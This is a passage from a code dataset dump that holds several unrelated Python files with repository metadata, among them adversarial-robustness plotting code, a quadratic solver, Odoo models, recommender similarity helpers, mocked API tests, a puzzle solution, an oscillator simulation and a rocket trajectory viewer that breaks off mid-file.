fig.add_subplot(gs[0,0]).legend(prop={\"size\": 10})\n# fig.add_subplot(gs[5,0]).set_ylabel(\"Frequency\")\n# fig.add_subplot(gs[9,0]).set_xlabel(\"Training iteration\")\n \n# fig.tight_layout()\n\n\n# def plot_dw_tilde_LR(log):\n \n# fig = plt.figure(figsize = [15,7])\n# fig.patch.set_facecolor('white')\n# # gs = fig.add_gridspec(10,1)\n \n# # dw_tilde_log = log.clone().detach()\n \n# # for j in range(10):\n# # fig.add_subplot(gs[j,0]).plot(dw_tilde_log[0,j,:].cpu().numpy(), color = \"C1\", label = \"actual\", linewidth=3.0, marker = \"\")\n# # fig.add_subplot(gs[j,0]).plot(dw_tilde_log[1,j,:].cpu().numpy(), color = \"C2\", label = \"estimated\", linewidth=3.0, marker = \"\")\n \n# gs = fig.add_gridspec(1,1)\n \n# dw_tilde_log = log.clone().detach()\n \n# for j in range(10):\n# fig.add_subplot(gs[0,0]).plot(dw_tilde_log[0,j,:].cpu().numpy(), color = \"C\"+str(j), label = \"actual\"+str(j), linewidth=3.0, marker = \"\",alpha=0.2)\n# fig.add_subplot(gs[0,0]).plot(dw_tilde_log[1,j,:].cpu().numpy(), color = \"C\"+str(j), label = \"estimated\"+str(j), linewidth=2.0, marker = \"\")\n \n# fig.add_subplot(gs[0,0]).legend(prop={\"size\": 10}) \n# # fig.add_subplot(gs[0,0]).set_xlabel(\"Training iteration\")\n# fig.tight_layout()\n# plt.gca().spines['top'].set_visible(False)\n# plt.gca().spines['right'].set_visible(False)\n \n \n# def plot_risk_adv_LR(log, threshold = 1e-3, plot_itr = 1000):\n# #simona\n# return 0\n \n# def plot_loss_adv_LR(log, threshold = 1e-3, plot_itr = 1000):\n \n# THRESHOLD = threshold\n \n \n# fig = plt.figure(figsize = [15,7])\n# fig.patch.set_facecolor('white')\n# gs = fig.add_gridspec(1,1)\n \n \n \n# loss_var, loss_mean = torch.var_mean(log, dim = 2)\n# # print(loss_mean.shape)\n# fill_up = loss_mean + loss_var\n# fill_low = loss_mean - loss_var\n\n# xrange = np.arange(log.shape[0])\n \n\n \n# loss_below_threshold = loss_mean < THRESHOLD\n \n# # 
print(loss_below_threshold.shape)\n \n# #loss_mean: [iteration, attacks, case]\n# # for _case in range(loss_mean.shape[2]):\n# # for _attack in range(loss_mean.shape[1]):\n# # fig_label = \" attack \"+str(_attack+1)\n# # fig.add_subplot(gs[_case,0]).plot(loss_mean[:, _attack, _case], color = \"C\"+str(_attack), label = fig_label, linewidth=3.0, marker = \"\")\n \n# # fig.add_subplot(gs[_case,0]).set_title(\"case \"+str(_case+1))\n# # fig.add_subplot(gs[_case,0]).legend(prop={\"size\": 10})\n \n \n# # for _attack in range(loss_mean.shape[1]):\n# # for _case in range(loss_mean.shape[2]):\n# # fig_label = \" case \"+str(_case+1)\n# # fig.add_subplot(gs[_attack+3,0]).plot(loss_mean[:, _attack, _case], color = \"C\"+str(_case), label = fig_label, linewidth=3.0, marker = \"\")\n \n# # fig.add_subplot(gs[_attack+3,0]).set_title(\"attack \"+str(_attack+1))\n# # fig.add_subplot(gs[_attack+3,0]).legend(prop={\"size\": 10})\n \n# for _case in range(loss_mean.shape[2]):\n# fig_label = \" case \"+str(_case+1)\n# fig.add_subplot(gs[0,0]).plot(loss_mean[:, 2, _case], color = \"C\"+str(_case), label = fig_label, linewidth=3.0, marker = \"\")\n# try:\n# fig.add_subplot(gs[0,0]).axvline(x=loss_below_threshold[:,2,_case].tolist().index(1), color = \"C\"+str(_case), linestyle = '--')\n# except ValueError as e:\n# print(\"Above loss threshold\")\n \n# fig.add_subplot(gs[0,0]).set_xlim([0, plot_itr])\n\n# # fig.add_subplot(gs[0,0]).set_title(\"attack \"+str(_case+1))\n# title_text = \"loss under attack with \"+ r\"$ \\Delta x = iDCT\\{ \\epsilon sign(r) \\frac{V\\~w}{||V\\~w||}\\}$ where $V =diag\\{0,1,...,1\\}$\"\n# fig.add_subplot(gs[0,0]).set_title(title_text,fontsize = 20)\n# fig.add_subplot(gs[0,0]).legend(prop={\"size\": 10})\n \n \n \n# # fig.add_subplot(gs[0,0]).fill_between(xrange, fill_up[:, i], fill_low[:, i], color = \"C\"+str(i), alpha=0.3)\n# # try:\n# # fig.add_subplot(gs[0,0]).axvline(x=loss_below_threshold[:,i].tolist().index(1), color = \"C\"+str(i), linestyle = '--')\n# # except ValueError as e:\n# # print(\"Above loss threshold\")\n \n \n# # fig.add_subplot(gs[0,0]).legend(prop={\"size\": 10})\n# fig.add_subplot(gs[0,0]).set_ylabel(\"loss\")\n# fig.add_subplot(gs[0,0]).set_xlabel(\"Training iteration\")\n# fig.tight_layout()\n# plt.gca().spines['top'].set_visible(False)\n# plt.gca().spines['right'].set_visible(False)\n \n \n \n \n \n \n \n### OBSOLETE ### \n# def train_LR_optim_lr(args, model, device):\n \n# iteration = args[\"itr\"]\n# _d = args[\"d\"]\n# _case = args[\"case\"]\n# _batchsize = args[\"bsize\"]\n# _mu = args[\"mu\"]\n# _std = args[\"std\"]\n# _lambbda = args[\"lambbda\"]\n# _lr = args[\"lr\"]\n \n# log_dict = defaultdict(lambda: list())\n \n# w = torch.zeros(_d, iteration, device = device)\n# w_tilde = torch.zeros(_d, iteration, device = device)\n# dw_tilde = torch.zeros(2, _d, iteration, device = device)\n# loss_log = torch.zeros(1, iteration, device = device)\n \n# optim_init = False\n# # opt = optim.SGD(model.parameters(), lr = 1e-2)\n \n# with trange(iteration) as t:\n# for i in range(iteration):\n\n# x, y = data_init_LR( case = _case, \n# d = _d, \n# batchsize = _batchsize, \n# mu = _mu, \n# std = _std, \n# lambbda = _lambbda)\n\n# x, y = x.to(device), y.to(device)\n\n# w_tilde_prev = dct(list(model.parameters())[0][0].view(_d,1)).squeeze().detach()\n \n \n# #### compute optimum learning rate:\n# # if _case == 1 and not optim_init:\n# # x_tilde = dct(x).squeeze()\n# # eta = 1/y.item()**2\n# # opt = optim.SGD(model.parameters(), lr = eta)\n# # optim_init = True\n# # 
print(\"init\")\n# # elif _case == 2 and not optim_init:\n# # x_tilde = dct(x).squeeze()\n# # eta = ((w_tilde_prev[0]-1)/(x_tilde[0]*(x_tilde*w_tilde_prev)[1:].sum() + x_tilde[0]**2 * (w_tilde_prev[0]-1) )).item()\n# # opt = optim.SGD(model.parameters(), lr = eta)\n# # optim_init = True\n# # print(\"init\")\n# # elif _case == 3 and not optim_init:\n \n# if not optim_init:\n# x_tilde = dct(x).squeeze()\n# eta = ((w_tilde_prev[0]-1)/(x_tilde[0]*(x_tilde*w_tilde_prev)[1:].sum() + x_tilde[0]**2 * (w_tilde_prev[0]-1) )).item()\n# opt = optim.SGD(model.parameters(), lr = eta)\n# optim_init = True\n# print(\"init\")\n \n\n# opt.zero_grad()\n\n# y_hat = model(x)\n# ipdb.set_trace()\n# # print(y_hat)\n\n# loss = ((1/2) * (y_hat.t() - y) ** 2).mean()\n# print(\"loss:\", loss.item())\n \n \n# # print(w_tilde_prev - eta*(y_hat-y).item()*x_tilde)\n# loss_log[:,i] = loss.item()\n\n\n# loss.backward()\n# opt.step()\n\n# w[:,i] = list(model.parameters())[0][0].detach()\n \n# w_tilde[:,i] = dct(w[:,i].view(_d,1)).squeeze().detach()\n# # print(-eta*(x_tilde[0]*(x_tilde*w_tilde_prev)[1:].sum() + y.item()**2*(w_tilde_prev[0]-1)).item())\n# # ipdb.set_trace()\n# # print(-eta*(((x_tilde*w_tilde_prev).sum() - y.item())*x_tilde)[0].item())\n# print(\"gradient update at dim 0 : \", w_tilde[0,i] - w_tilde_prev[0])\n# print(w_tilde[0,i])\n# dw_tilde[0,:,i] = -(w_tilde[:,i] - w_tilde_prev).detach()\n# dw_tilde[1,:,i] = grad_estimation(w_tilde_prev, \n# _lr, \n# _case, \n# _d, \n# _mu, \n# _std, \n# _lambbda).squeeze().detach()\n\n# t.set_postfix(loss = loss.item())\n# t.update()\n \n# log_dict[\"w\"] = w\n# log_dict[\"w_tilde\"] = w_tilde\n# log_dict[\"dw_tilde\"] = dw_tilde\n# log_dict[\"loss\"] = loss_log\n\n# return log_dict\n\n# def plot_first_dim_comparison_LR():\n# fig_test = plt.figure(figsize = [15,5])\n# gs = fig_test.add_gridspec(1,1)\n# p1 = fig_test.add_subplot(gs[0,0]).imshow(diff_map.cpu().detach().numpy(), cmap = 'Reds', aspect = 40.0, vmax = diff_map.max(), vmin = 0)\n# fig_test.colorbar(p1)\n# fig_test.add_subplot(gs[0,0]).set_ylabel(\"Frequency\")\n# fig_test.add_subplot(gs[0,0]).set_xlabel(\"Training iteration\")\n# plt.gca().spines['top'].set_visible(False)\n# plt.gca().spines['right'].set_visible(False)","repo_name":"averyma/freq-robust-obsolete","sub_path":"src/logistic_analysis.py","file_name":"logistic_analysis.py","file_ext":"py","file_size_in_byte":23221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"10089020799","text":"print('MENCARI AKAR AKAR PERSAMAAN KUADRAT')\nimport time\nprint('please wait...')\ntime.sleep(2)\nprint('\\x1bc')\nimport math\ncount=1\nwhile count >0 :\n\tprint('\\x1bc')\n\tprint('Masukkan angka')\n\ta=float(input('a = '))\n\tb=float(input('b = '))\n\tc=float(input('c = '))\n\tD=a*c*4\n\tplusmin= math.sqrt ( b**2 - D)\n\txsatu=(-b+plusmin)/(2*a)\n\txdua=(-b-plusmin)/(2*a)\n\tprint('maka,') ; print ('diskriminan = ', D)\n\tprint('akar akar persamaan = ', xsatu , ' atau ' , xdua)\n\tpenentu=input('Lagi? Y/N? 
')\n\tif penentu=='N':\n\t\tbreak\n\telif penentu=='Y':\n\t\tcount=count+1\n\telse :\n\t\tprint('\\x1bc')\n\t\tprint('JAWAB YANG BENER WOI')\n\t\ttime.sleep (2)\n\t\tprint('Dahlah, males...., ngodingnya lama')\n\t\ttime.sleep(1)\n\t\tbreak\n","repo_name":"Hamdan26/persamaankuadratcobacoba","sub_path":"perskuad.py","file_name":"perskuad.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29733727736","text":"class UTG(object):\n \"\"\"\n UI transition graph\n \"\"\"\n\n def __init__(self, device, app):\n self.device = device\n self.app = app\n\n self.node2states = {}\n self.edge2events = {}\n\n def add_transition(self, event_str, old_state, new_state):\n old_node = self.state_to_node(old_state)\n new_node = self.state_to_node(new_state)\n self.add_edge(event_str, old_node, new_node)\n\n def state_to_node(self, state):\n if state is None:\n state_str = \"none\"\n state_tag = \"none\"\n else:\n state_str = state.get_state_str()\n state_tag = state.tag\n if state_str not in self.node2states:\n self.node2states[state_str] = []\n self.node2states[state_str].append(state_tag)\n return state_str\n\n def add_edge(self, event_str, old_node, new_node):\n if old_node == new_node:\n return\n edge_str = \"<%s> --> <%s>\" % (old_node, new_node)\n if edge_str not in self.edge2events:\n self.edge2events[edge_str] = []\n self.edge2events[edge_str].append(event_str)\n","repo_name":"MiniMinyi/app_traffic_collector","sub_path":"droidbot/droidbot/utg.py","file_name":"utg.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40577333022","text":"from odoo import fields,api,models\nfrom odoo.exceptions import ValidationError\n\nclass ClassManage(models.Model):\n _name = \"class.manage\"\n _description = \"Quản lý lớp học\"\n\n classname = fields.Char(string='Lớp')\n number = fields.Integer(string='Sĩ số',readonly=True)\n number1 = fields.Integer(string='Số HS TB',readonly=True,compute='_hs') \n number2 = fields.Integer(string='Số HS Khá',readonly=True,compute='_hs')\n number3 = fields.Integer(string='Số HS Giỏi',readonly=True,compute='_hs')\n classman_id = fields.One2many('class.student','classstu_id',string='Lớp học')\n\n\n @api.depends('classman_id')\n def _hs(self):\n for diem in self:\n diem.number = len(diem.classman_id)\n diem.number1 = len(diem.classman_id.filtered(lambda r: r.value == 'TB'))\n diem.number2 = len(diem.classman_id.filtered(lambda r: r.value == 'K'))\n diem.number3 = len(diem.classman_id.filtered(lambda r: r.value == 'G'))\n\nclass ClassStudent(models.Model):\n _name = \"class.student\"\n _description = \"Quản lý học sinh\"\n\n classstu_id = fields.Many2one('class.manage',string='Lớp',required=True,ondelete='cascade')\n name = fields.Char(string='Họ tên')\n point = fields.Integer(string='Điểm')\n value = fields.Selection([('TB','Trung bình'),\n ('K','Khá'),\n ('G','Giỏi')],\n string='Đánh giá',compute='_danh_gia')\n \n @api.constrains('point')\n def _check_point(self):\n for diem in self:\n if diem.point < 0 or diem.point > 10:\n raise ValidationError('Điểm số phải nằm trong khoảng từ 0 đến 10')\n \n @api.depends('point')\n def _danh_gia(self):\n for diem in self:\n if diem.point <= 6:\n diem.value = 'TB'\n elif diem.point <= 8:\n diem.value = 'K'\n else:\n diem.value = 
'G'\n","repo_name":"mrsunday2705/khung","sub_path":"models/classman.py","file_name":"classman.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72424017414","text":"# matrix of users_item\n# divide dataset\n# normalizer dataset for only 0 or 1\n# calculate similarities between users of trainning set\n# save similarities\n\nimport pandas as pd\nimport numpy as np\nimport sys\nfrom calculateSimilarity import *\n\ndef getUserClustersMatrixFromCSV(csvPath):\n matrix = pd.read_csv(csvPath)\n\n return pd.DataFrame(matrix)\n\n\ndef reduceDataFrame(df, toReduce):\n '''\n reduce data for the desired columns, to calculate similarity\n :param df: pandas df\n :return: pandas df reduced\n '''\n\n df = df.drop(df.columns[toReduce], axis=1)\n\n return df\n\n\ndef divideDataSetCrossValidation(df, limitMin, limitMax):\n '''\n\n :param df:\n :param limitMin:\n :param limitMax:\n :return:\n '''\n\n training = df.drop(df.columns[[np.arange(limitMin, limitMax)]], axis=1)\n\n test = df[df.columns[limitMin:limitMax]]\n #test = df.drop(df.columns[[np.arange(0, limit1)]], axis=1)\n\n return training, test\n\n\ndef divideDataSet(df, percentage):\n\n '''\n\n :param df:\n :param percentage:\n :return: pandas arrays\n '''\n sSize, ySize = df.shape\n\n limit1 = int(ySize * percentage)\n\n training = df.drop(df.columns[[np.arange(limit1, ySize)]], axis=1)\n\n test = df.drop(df.columns[[np.arange(0, limit1)]], axis=1)\n\n return training, test\n\n\ndef getItemItemSimilarity(item, trainingSet, similarityMeasure, listOfitems, clusterID):\n\n similarityMatrix = getSimilarityMatrixCdist(item, trainingSet, similarityMeasure)\n\n similaritiesForItem = []\n\n for id, sim in zip(listOfitems, similarityMatrix[0]):\n arraySim = [clusterID, id, sim]\n\n similaritiesForItem.append(arraySim)\n\n\n return pd.DataFrame(similaritiesForItem)\n\n\ndef getItemSimilarity(trainingSet, similarityMeasure, originalIDs, itemID):\n item = trainingSet.ix[itemID]\n\n trainingSet = np.array(trainingSet)\n # calculate similarities for training set\n\n xSize, ySize = trainingSet.shape\n\n similaritiesForItems = []\n # for user in trainingSet:\n\n item = np.reshape(item, (-1, ySize))\n similarityMatrix = getSimilarityMatrixCdist(item, trainingSet, similarityMeasure)\n\n for id, sim in zip(originalIDs, similarityMatrix[0]):\n arraySim = [itemID, id, sim]\n\n similaritiesForItems.append(arraySim)\n\n return pd.DataFrame(similaritiesForItems)\n\n\ndef getUserSimilarity(trainingSet, similarityMeasure, originalIDs, userID):\n user = trainingSet.ix[userID]\n\n\n trainingSet = np.array(trainingSet)\n # calculate similarities for training set\n\n xSize, ySize = trainingSet.shape\n\n\n similaritiesForUser = []\n count = 0\n # for user in trainingSet:\n\n user = np.reshape(np.array(user), (-1, ySize))\n similarityMatrix = getSimilarityMatrixCdist(user, trainingSet, similarityMeasure)\n\n for id, sim in zip(originalIDs, similarityMatrix[0]):\n arraySim = [userID, id, sim]\n\n similaritiesForUser.append(arraySim)\n\n return pd.DataFrame(similaritiesForUser)\n","repo_name":"lasigeBioTM/EvalRecSys","sub_path":"evaluateRecSys/getUserSimilarity.py","file_name":"getUserSimilarity.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"34176386472","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of Kwek Metrics.\n\n\"\"\"Test external API calling 
mechanism.\"\"\"\n\nimport responses\n\nfrom api.hawkular import query_api\nfrom api.hawkular import get_metric\nfrom api.hawkular import get_os_projects\n\nMETRICS_URL = 'https://metrics-url.com/'\nOS_URL = 'https://os-url.com/'\n\n\ndef test_generic_api_call():\n with responses.RequestsMock() as rsps:\n # Mock\n rsps.add(responses.GET,\n METRICS_URL,\n body='{\"got\": \"this\"}', status=200,\n content_type='application/json')\n # Test\n resp = query_api(METRICS_URL)\n assert resp is not None\n assert resp.json() == {'got': 'this'}\n\n assert len(rsps.calls) == 1\n assert rsps.calls[0].request.url == METRICS_URL\n assert rsps.calls[0].response.text == '{\"got\": \"this\"}'\n\n\ndef test_getting_user_projects(mock_os_api_get_projects):\n \"\"\"Tests getting a response with four projects.\n\n Args:\n mock_os_api_get_projects (mock): mock method for the API Call\n\n \"\"\"\n with responses.RequestsMock(assert_all_requests_are_fired=True) as rsps:\n # Mock\n rsps.add_callback(\n responses.GET,\n OS_URL,\n callback=mock_os_api_get_projects)\n\n # Test\n # This data comes from elsewhere\n url = OS_URL\n auth = 'XXXX'\n resp = get_os_projects(url, auth)\n\n assert len(resp) == 4\n assert resp[0]['metadata']['name'] is not None\n\n\ndef test_get_hawkular_metric_from_namespace(mock_hawkular_api):\n with responses.RequestsMock(assert_all_requests_are_fired=True) as rsps:\n # Mock\n rsps.add_callback(\n responses.GET, METRICS_URL,\n callback=mock_hawkular_api\n )\n\n # Test\n # This data comes from elsewhere..\n metric = 'cpu%2Fusage_rate'\n tenant = '_tenant'\n auth = 'XXXX'\n url = METRICS_URL\n resp = get_metric(url, tenant, auth, metric)\n\n assert resp is not None\n assert len(resp) >= 1\n\n\ndef test_aggregating_metrics():\n \"\"\"Test getting metrics from multiple namespaces and aggregating them\n \"\"\"\n pass\n","repo_name":"jsvgoncalves/kwek-metrics","sub_path":"api/tests/test_api_calls.py","file_name":"test_api_calls.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"39475242625","text":"from collections import defaultdict\nfrom util import *\nimport re\n\n#File parsing stuff\ndef dataToParsedArray(stringData) :\n\tresult = [] \n\tfor line in stringData.split(\"\\n\"):\n\t\tline = line.strip()\n\t\tif line != \"\":\n\t\t\tresult.append(parse(line))\n\treturn Geology(result)\n\ndef parse(line) :\n\tmapLine = []\n\tfor char in line:\n\t\tif char == \".\":\n\t\t\tmapLine.append(0)\n\t\telif char == \"#\":\n\t\t\tmapLine.append(1)\n\treturn mapLine\n\n#Problem code\n\ndef part1(data):\n\treturn data.countForSlope(3,1)\n\n\ndef part2(data):\n\tmult = 1\n\tfor (x,y) in [(1,1),(3,1),(5,1),(7,1),(1,2)]:\n\t\tmult *= data.countForSlope(x,y)\n\treturn mult\n\nclass Geology:\n\n\tdef __init__(self, geo):\n\t\tself.geo = geo\n\t\tself.height = len(geo)\n\n\tdef isTree(self, x, y):\n\t\trow = self.geo[y]\n\t\tcell = row[x % len(row)]\n\t\treturn cell == 1\n\n\tdef countForSlope(self, slopeX, slopeY):\n\t\tx = 0\n\t\ty = 0\n\t\ttreeCounter = 0\n\t\twhile y < self.height:\n\t\t\tx += slopeX\n\t\t\ty += slopeY\n\t\t\tif y < self.height and self.isTree(x,y):\n\t\t\t\ttreeCounter += 1\n\t\treturn treeCounter\n\n#Execution stuff\n\ndef test1():\n\trawInput = \"..##.......\\n#...#...#..\\n.#....#..#.\\n..#.#...#.#\\n.#...##..#.\\n..#.##.....\\n.#.#.#....#\\n.#........#\\n#.##...#...\\n#...##....#\\n.#..#...#.#\\n\"\n\tdata = dataToParsedArray(rawInput)\n\tprint(part1(data))\n\treturn\n\ndef 
test2():\n\trawInput = \"..##.......\\n#...#...#..\\n.#....#..#.\\n..#.#...#.#\\n.#...##..#.\\n..#.##.....\\n.#.#.#....#\\n.#........#\\n#.##...#...\\n#...##....#\\n.#..#...#.#\\n\"\n\tdata = dataToParsedArray(rawInput)\n\tprint(part2(data))\n\treturn\n\ndef main():\n\trawInput = open(\"./input/3.txt\").read()\n\tdata = dataToParsedArray(rawInput)\n\tprint(part1(data))\n\tprint(part2(data))\n\treturn\n\n#test1()\n#test2()\nmain()","repo_name":"BNeutral/Advent-of-Code","sub_path":"Advent 2020/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71047210053","text":"import numpy as np\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt\nimport ray\nimport multiprocessing\n\nray.init(num_cpus=multiprocessing.cpu_count())\n\ndelta = 0.05\nm = 1\nk = 1\nl_0 = 1\na = 0.4\nomega = 1\nphi = np.pi * 0\n\n\ndef dU_dx(U, x):\n # Here U is a vector such that y=U[0] and z=U[1]. This function should return [y', z']\n return [U[1], -1000 * U[1] - 2 * U[0] + 1 * np.cos(2 * x)]\n\n\ndef quad_dU_dx(U, t):\n # Here U is a vector such that y=U[0] and z=U[1]. This function should return [y', z']\n y = U[0]\n z = U[1]\n l = l_0 + a * np.cos(omega * t + phi)\n return [z, - k / m * (1 - (1 / (np.sqrt(1 + ((y * y) / (l * l)))))) * y - delta * z]\n\n\n# y_0 = 1\n# z_0 = 1\n# U0 = [y_0, z_0]\n# xs = np.linspace(0, 500, 10000)\n# Us = odeint(quad_dU_dx, U0, xs)\n# ys = Us[:, 0]\n# phase_map = Us[:, 1]\n#\n# plt.xlabel(\"x\")\n# plt.ylabel(\"y\")\n# plt.title(\"Damped harmonic oscillator\")\n# plt.plot(xs, ys)\n# plt.grid()\n# plt.show()\n#\n# plt.plot(Us[:, 1], ys)\n# plt.grid()\n# plt.show()\n\nlimit = 0.2\nindicate = False\n\n\n@ray.remote\ndef func(y_0):\n inner_result = []\n\n for z_0 in np.linspace(-2, 2, 1000):\n U0 = [y_0, z_0]\n ts = np.linspace(0, 1000, 50)\n Us = odeint(quad_dU_dx, U0, ts)\n xs = Us[:, 0]\n vs = Us[:, 1]\n l_2 = np.sqrt(np.multiply(xs, xs) + np.multiply(vs, vs))\n\n if indicate:\n indicate_list = np.where(l_2 < limit, 1, 0)\n indicator = indicate_list.sum()\n\n if indicator:\n # no oscillation\n inner_result.append([y_0, z_0, 0])\n else:\n # oscillation\n inner_result.append([y_0, z_0, 1])\n else:\n minimum = l_2.min()\n inner_result.append([y_0, z_0, minimum])\n\n return inner_result\n\n\nresult = []\n\nfor y_0 in np.linspace(-2, 2, 1000):\n result.append(func.remote(y_0))\n\nresult = ray.get(result)\n\nresult = np.array(result)\nresult = result.reshape((result.shape[0] * result.shape[1], -1))\n\nplt.scatter(result[:, 0], result[:, 1], c=result[:, 2], s=1)\nplt.colorbar()\nplt.show()\n\n","repo_name":"levopeti/utils","sub_path":"quadratic_oscillator.py","file_name":"quadratic_oscillator.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27983855924","text":"import vispy\nfrom vispy import scene\nfrom vispy.scene import visuals\nfrom vispy.scene.visuals import GridLines\nfrom vispy.scene.visuals import XYZAxis\nfrom vispy.scene.visuals import LinePlot\nfrom vispy.color import ColorArray\n\nfrom PyQt5.QtWidgets import QMainWindow, QVBoxLayout, QDialog\nfrom PyQt5.QtWidgets import QPushButton, QSlider, QLabel, QFileDialog, QProgressBar\nfrom PyQt5.QtCore import QTimer\nfrom PyQt5 import uic\n\nfrom scipy.interpolate import interp1d\nimport numpy as np\nimport quaternion\nimport pandas as pd\nimport json\nimport os\n\nTHIS_FILE_DIR = 
os.path.dirname(os.path.abspath(__file__))\nCONFIG_FILE = os.path.join(THIS_FILE_DIR, 'config.json')\n\nclass MyUi(QMainWindow):\n def __init__(self):\n super(MyUi, self).__init__()\n uic.loadUi('viewer.ui', self)\n\n self.vispy_view = self.findChild(QVBoxLayout, 'vispy_view')\n\n self.pause_btn = self.findChild(QPushButton, 'pause_button')\n self.start_btn = self.findChild(QPushButton, 'start_button')\n self.stop_btn = self.findChild(QPushButton, 'stop_button')\n\n # slider\n self.t_slider = self.findChild(QSlider, 'time_slider')\n # progress bar\n self.progress_bar = self.findChild(QProgressBar, 'progressBar')\n\n # load buttons\n self.load_param_title = self.findChild(QLabel, 'param_load_title')\n self.load_param_btn = self.findChild(QPushButton, 'param_load_button')\n self.load_trajec_title = self.findChild(QLabel, 'trajec_load_title')\n self.load_trajec_btn = self.findChild(QPushButton, 'trajec_load_button')\n self.load_obj_title = self.findChild(QLabel, 'model_load_title')\n self.load_obj_btn = self.findChild(QPushButton, 'model_load_button')\n self.load_evlog_title = self.findChild(QLabel, 'eventlog_load_title')\n self.load_evlog_btn = self.findChild(QPushButton, 'eventlog_load_button')\n self.import_btn = self.findChild(QPushButton, 'load_button')\n\n # status\n self.t_text = self.findChild(QLabel, 't_val')\n self.v_text = self.findChild(QLabel, 'v_val')\n self.v_norm_text = self.findChild(QLabel, 'v_norm_val')\n self.r_text = self.findChild(QLabel, 'r_val')\n self.w_text = self.findChild(QLabel, 'w_val')\n\n def show_file_dialog(self, title='Open File', path='./', ext='*.*'):\n fname = QFileDialog.getOpenFileName(self, title, path, ext)\n return fname[0] # return file path\n\n\nclass RocketMesh:\n def __init__(self, filename, CG_pos=0.0):\n self.CG_pos = np.array([CG_pos, 0.0, 0.0])\n\n self.vertices, self.faces, self.normals, self.texcoords = self._load_obj(filename)\n\n self.visual = visuals.Mesh(self.vertices, self.faces, color='red')\n self.visual.light_dir = [-0.3, -0.3, -1.0]\n # self.visual.ambient_color = 'gray'\n\n # self.pos = np.zeros((3))\n # self.q = np.zeros((4))\n\n def load_model(self, filename):\n self.vertices, self.faces, self.normals, self.texcoords = self._load_obj(filename)\n self.visual.set_data(self.vertices, self.faces, color='red')\n\n def set_scale(self, scale):\n '''\n scale: scale array [sx, sy, sz]\n '''\n self.vertices *= scale\n\n def set_CG_pos(self, pos):\n self.CG_pos = pos\n # self.move(self.pos, self.q)\n \n def set_vertices(self, v):\n self.visual.set_data(v, self.faces, color='red')\n self.visual.light_dir = [-0.3, -0.3, -1.0]\n\n def move(self, pos, q=None): # q: float*4 array of attitude quaternion\n _v = np.copy(self.vertices) + self.CG_pos\n \n if q is not None:\n _q = quaternion.as_quat_array(q)\n attitude = quaternion.as_rotation_matrix(_q)\n\n _v = np.dot(attitude, _v.T).T\n _v += pos\n\n # self.pos = np.copy(pos)\n # self.q = np.copy(q)\n self.visual.set_data(_v, self.faces, color='red')\n self.visual.light_dir = [-0.3, -0.3, -1.0]\n # self.visual.ambient_color = 'gray'\n\n def _load_obj(self, filename):\n v, f, n, t = vispy.io.read_mesh(filename)\n return np.array(v), np.array(f), np.array(n), np.array(t)\n\n\nclass UIHandler:\n def __init__(self, ui:MyUi, canvas, camera, use_pre_rendering=True):\n self.ui = ui\n self.canvas = canvas\n self.camera = camera\n self.ui.vispy_view.addWidget(canvas.native)\n\n self.use_pre_rendering = use_pre_rendering\n\n # member variables initialization\n self._ready = False\n self._slider_dt = 0.01\n 
self._playback_mode = False\n self._current_t = 0.0\n self._playback_timer = QTimer(self.ui)\n self.obj_file = ''\n self.param_file = ''\n self.trajec_file = ''\n\n self.evlog_file = ''\n self.evlog = {}\n\n # self.rocket_model = RocketMesh('bianca.obj')\n # デフォルトモデルを読み込み\n std_model_path = os.path.join(THIS_FILE_DIR, 'samples/std_scale.obj')\n self.rocket_model = RocketMesh(std_model_path)\n self.rocket_model.set_scale(np.array([1.0, 0.1, 0.1]))\n self.rocket_model.set_CG_pos(np.array([0.5, 0, 0]))\n self.rocket_model.move(np.array([0.0, 0.0, 0.0]))\n\n # set events\n self.ui.load_trajec_btn.clicked.connect(self.load_trajectory)\n self.ui.load_param_btn.clicked.connect(self.load_params)\n self.ui.load_obj_btn.clicked.connect(self.load_obj)\n self.ui.load_evlog_btn.clicked.connect(self.load_eventlog)\n self.ui.import_btn.clicked.connect(self.setup_rendering)\n \n self.ui.start_btn.clicked.connect(self.on_start_clicked)\n self.ui.pause_btn.clicked.connect(self.on_pause_clicked)\n self.ui.stop_btn.clicked.connect(self.on_stop_clicked)\n \n self.ui.t_slider.setMinimum(0)\n self.ui.t_slider.setMaximum(1)\n self.ui.t_slider.setSingleStep(1)\n self.ui.t_slider.valueChanged[int].connect(self.on_slider_changed)\n\n self.trajec_plot_model = None\n # event markers\n self.trajec_event_markers = visuals.Markers()\n self.trajec_event_texts = None\n\n view = self.canvas.central_widget.add_view()\n view.add(GridLines())\n view.add(XYZAxis())\n # view.add(self.trajec_event_markers)\n # view.add(self.trajec_plot_model)\n view.add(self.rocket_model.visual)\n view.bgcolor = 'gray'\n view.camera = self.camera\n view.padding = 12\n self.view = view\n self.canvas.show()\n self.ui.show()\n\n def load_obj(self):\n filename = self.ui.show_file_dialog('ロケット3Dファイルを選択', './', '*.obj')\n if filename == '':\n self.ui.load_obj_title.setText('ロケット3Dモデル(obj)')\n return\n self.ui.load_obj_title.setText(filename)\n self.obj_file = filename\n return filename\n\n def load_trajectory(self):\n filename = self.ui.show_file_dialog('飛行履歴ファイルを選択', './', '*.csv')\n if filename == '':\n self.ui.load_trajec_title.setText('飛翔履歴ファイル(csv)')\n return\n\n self.ui.load_trajec_title.setText(filename)\n self.trajec_file = filename\n return filename\n \n def load_params(self):\n filename = self.ui.show_file_dialog('ロケットパラメータファイルを選択', './', '*.json')\n if filename == '':\n 